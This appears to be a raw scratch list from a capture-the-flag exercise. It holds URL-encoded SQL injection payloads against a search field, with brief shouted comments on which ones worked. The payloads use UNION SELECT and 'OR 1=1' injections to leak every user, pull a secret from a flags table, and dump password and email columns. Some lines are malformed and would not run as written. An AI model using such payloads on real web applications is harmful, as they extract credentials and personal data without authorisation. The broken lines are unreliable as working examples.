
marie%25'%20UNION%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20users%20--%20-

THIS ONE LEAKED ALL THE USERS
marie%25'%20OR%201%3D%1%20--%20-

TRYING TO GET SOMETHING OUT OF FLAG
marie%25'%20UNION%20SELECT%20flag_id%2Cflag%2CNULL%2CNULL%20FROM%20flags%20--%20-
marie%25'%3BSELECT%20flag%20FROMflags%20WHERE%20flag_id%3D%'de3b1c'%20--%20-
marie%25'%20UNION%20SELECT%20flag%2CNULL%2CNULL%2CNULL%20FROM%20flags%20WHERE%20flag_id%3D'de3b1c'%20--%20-
pauli%25'%20OR%20%28SELECT%20flag%20FROM%20flags%20WHERE%20flag_id%3D'de3b1c'%29%20--%20-

GONNA TRY TO LEAK ANOTHER COLUMN
marie%25'%20UNION%20SELECT%20usPasse%2CusMail%2CusVille%2CusWeb%20FROM%20users%20--%20-
